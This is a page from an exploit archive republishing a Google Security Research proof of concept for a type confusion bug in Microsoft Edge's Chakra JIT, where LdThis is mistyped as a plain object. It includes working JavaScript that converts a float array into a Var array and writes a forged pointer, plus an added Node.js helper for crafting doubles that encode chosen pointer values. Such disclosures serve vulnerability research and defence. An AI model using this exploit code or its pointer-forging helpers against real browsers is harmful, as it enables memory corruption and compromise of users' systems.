Microsoft Edge Chakra JIT - LdThis Type Confusion Exploit

1337DAY-ID-29796
Google Security Research
Published: Feb 15, 2018 (0day.today)
EPSS: 0.953 (High), percentile 99.4%

Exploit for windows platform in category dos / poc

/*
The Chakra JIT assumes that the value type of an LdThis instruction's result is "Object" (a plain object). Since "this" can be any other object, for example an array, the result has to be assumed to be "LikelyObject"; otherwise operations on "this" are not type-checked properly.

In the PoC below, opt is first JIT-compiled with a plain object as "this", so "this[0] = {}" is compiled as an ordinary object property store that the JIT does not expect to change the kind of any array. When opt is then called with arr as "this", that store converts arr from a native float array into a Var array, but the following "arr[0] = ..." is still compiled as a raw double store into a float array. The bit pattern of 2.3023e-320 (0x1234) therefore ends up in a Var slot as a bogus object pointer, and print(arr) dereferences it.
 
PoC:
*/
 
function opt(arr) {
    // Compiled as a store to a native float array (arr holds 1.1).
    arr[0] = 1.1;
    // LdThis is typed "Object", so this store is compiled as a plain object
    // property write and is not expected to change any array's kind.
    // When this === arr, it converts arr from a float array to a Var array.
    this[0] = {};
    // Still compiled as a raw double store into a float array; after the
    // conversion the bits of 2.3023e-320 (0x1234) land in a Var slot.
    arr[0] = 2.3023e-320;
}
 
function main() {
    let arr = [1.1];
    // Warm up with a plain object as "this" so the JIT compiles opt with the
    // "Object" assumption for LdThis.
    for (let i = 0; i < 10000; i++) {
        opt.call({}, arr);
    }
 
    // Now pass the array itself as "this": the aliasing goes undetected.
    opt.call(arr, arr);
    // print is the ChakraCore shell (ch) builtin; reading arr[0] back as a
    // Var dereferences the forged pointer 0x1234 and crashes.
    print(arr);
}
 
main();
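As an added example (not part of the original PoC or of Google Security Research's code), the following Node.js script shows why the final store in the PoC uses 2.3023e-320: a Chakra native float array holds raw IEEE-754 doubles, while a Var array holds tagged pointers, so once the JIT'd float store hits a Var slot the double's bit pattern is what gets interpreted as a Var. The helpers convert between the two views so the written value can be chosen deliberately. The Var-tag layout used in varKind is my assumption about Chakra's x64 encoding (top 16 bits clear for object pointers, 0x0001 for tagged ints, 0xFFFC and above for boxed doubles), not something the page states.

```javascript
// Added example (not part of the original PoC): why the PoC stores 2.3023e-320.
// A Float64Array and a BigUint64Array over the same 8 bytes give the double
// view and the raw-bits view of one 64-bit slot, which is exactly the
// confusion the JIT'd code has between a float-array slot and a Var slot.
const scratch = new ArrayBuffer(8);
const asDouble = new Float64Array(scratch);
const asU64 = new BigUint64Array(scratch);

// Raw 64-bit pattern of a double, as a BigInt.
function doubleToBits(d) {
    asDouble[0] = d;
    return asU64[0];
}

// Double whose IEEE-754 encoding is the given 64-bit pattern.
function bitsToDouble(bits) {
    asU64[0] = BigInt.asUintN(64, BigInt(bits));
    return asDouble[0];
}

function toHex64(bits) {
    return '0x' + bits.toString(16).padStart(16, '0');
}

// Assumption (my understanding of Chakra's x64 Var encoding, not from the
// page): a Var with the top 16 bits clear is an object pointer, 0x0001 in
// the top 16 bits is a tagged int, and 0xFFFC or above is a boxed double.
function varKind(bits) {
    const top16 = BigInt.asUintN(64, BigInt(bits)) >> 48n;
    if (top16 === 0n) return 'pointer';
    if (top16 === 1n) return 'tagged-int';
    if (top16 >= 0xFFFCn) return 'double';
    return 'unknown';
}

// The double that, written through the stale float-array store, becomes the
// chosen Var pointer. For small addresses this is a subnormal double, which
// is why the PoC's constant looks like noise.
function doubleForPointer(ptr) {
    return bitsToDouble(ptr);
}

console.log(toHex64(doubleToBits(2.3023e-320))); // 0x0000000000001234
console.log(varKind(doubleToBits(2.3023e-320))); // pointer
console.log(doubleForPointer(0x41414141n));      // subnormal double for 0x41414141
```

Running it under Node shows that 2.3023e-320 is simply the double whose encoding is 0x1234, which Chakra treats as an object pointer; an ordinary value such as 1.1 (0x3FF199999999999A) would not even look like a valid Var.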

#  0day.today [2018-03-13]  #